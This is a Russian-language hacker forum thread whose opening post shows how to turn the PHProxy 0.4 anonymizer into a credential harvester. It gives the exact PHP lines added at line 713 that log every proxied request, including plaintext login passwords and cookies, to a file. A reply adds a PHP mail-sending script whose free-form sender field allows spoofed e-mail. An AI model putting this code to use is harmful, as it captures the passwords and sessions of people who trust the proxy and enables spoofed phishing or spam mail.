Вообщем буду краток... Воруем пароли с помощью анонимайзера Недавно решил написать анонимайзер... Но так и не начал, так как появилась другая идея! Вести лог запросов с моего анонимайзера... Ведь там хрогиться много чего интересного, например Наши куки, да что куки там пароль в открытом виде! =) Например: Мы зашли на форум античата через скирпт и сразу пошли авторизоваться... При авторизации отправляемый пакет выглядит следующим образом: PHP: POST /login.php HTTP/1.0 Host: forum.antichat.ru:80 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1) Gecko/20061010 Firefox/2.0 Referer: http://forum.antichat.ru Content-Type: application/x-www-form-urlencoded Content-Length: 151 vb_login_username=[НАШ_ЛОГИН]&vb_login_password=[НАШ ПАРОЛЬ]&cookieuser=1&do=login&forceredirect=1&vb_login_md5password= Как видно наш пароль виден! (с) Поэтому не решил заморачиваться писать его, а просто изменил уже готовый... Я взял PHProxy 0.4 (Взять его можно тут ) Начал изучать его работу и искал место, где он отправляет пакеты на сервер... Это место я нашел! (Действительно, писал бы я ето, еслиб не нашел?...) =) В файле PHProxy.class.php на линии 713. PHP: $this->request_headers = $headers; Тут все данные собираются в одну переменну, т.е. в готовый пакет... Именно этот пакет то нам и нужен... Осталось тока его сохранять в файл при каждой отправке... Делается это просто: PHP: $this->request_headers = $headers; $txt = fopen ("log.txt","a"); fputs($txt,$headers."\r\n=================================\r\n"); fclose($txt); Теперь все пакеты будут отправляться на сервер и одновременно записоваться в лог... Конечно txt файл не очень удобен, но им и не ограничевается! Можно создать базу данных, куда будут запихиваться пакеты... Для удобства можно, чтобы каждая таблица имела имя хоста а вней уже все пакеты с него... Вообщем простор есть =) ЗЫ. Сразу скажу, что PHProxy использовал на апаче, причем удачно, на сайты не загружал =) вы можете использовать любой другой анонимайзер =) ЗЗЫ. Извиняюсь, если криво оформлено, или подобная статья уже есть... Или если это вообще бред... =) Думаю и статьей это трудно назвать... Интересно станите ли вы доверять им после прочтенного? (с) bul666
эххххххх бульба) приболел? во лови и не парься) mail.php PHP: <? print("<!-- coded Sn@k3 2006 Ma1l S3nd (c) --> <meta Content-type: text/plain; charset=windows-1253> <html> <head><title>Ma1l S3nD 0.1</title><body background='1010.JPG'></head><hr width='80%' color='#555555'><center><h1>Ma1l S3nD 0.1</h1></center><hr width='80%' color='#555555' /> <form name='Send' method='post' action='mailer.php'> <input type='text'name='poluchatel' value=''>:[email protected]<br> <input type='text' name='otpravitel' value=''>:[email protected] or Anton <оtprа[email protected]><br> <input type='text' name='subj' value='Превед...'> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'>:html <input type='radio' name='tipe' value='plain'>:text <br> <textarea name='messaga' rows='4' cols='110' value='Сообщение'></textarea><input type='submit' name='send' value='отправить'> </form><hr width='100%' color='#f01f1f' /><center><a href='http://Snak3.microsoftt.ru' title='Перейти на главную страницу'>Snak3.microsoftt.ru 2006 (c)</a></center><hr width='100%' color='#f01f1f' /> </html>"); ?> PHP: <? if($poluchatel) { if($otpravitel) { if($messaga) { $to = "$poluchatel" . ", " ; $subject = "$subj"; $message = $messaga; $headers = "MIME-Version: 1.0 "; $headers .= "Content-type: text/$tipe; charset=iso-8859-1 "; $headers .= "From: $otpravitel "; mail($to, $subject, $message, $headers); echo('<body background="1010.jpg"><center><b><font color="green">Сообщение успешно отправлено</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>'); } else { echo('<body background="0101.jpg"><center><b><font color="red">Следует ввести текст сообщения!</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>'); } } else { echo('<body background="0101.jpg"><center><b><font color="red">Введите отправителя письма, то есть ваш e-mail.</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>'); } } else { echo('<body background="0101.jpg"><center><b><font color="red">Необходимо ввести получателя данного письма.</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>'); } // Snak3.microsoftt.ru Sn@k3 ICQ 127924 ?>
А так какой процент? При заходе через анонимайзер на форум, даже если вы до этого были авторизированы там, все равно придется заново проходить авторизацию... =)
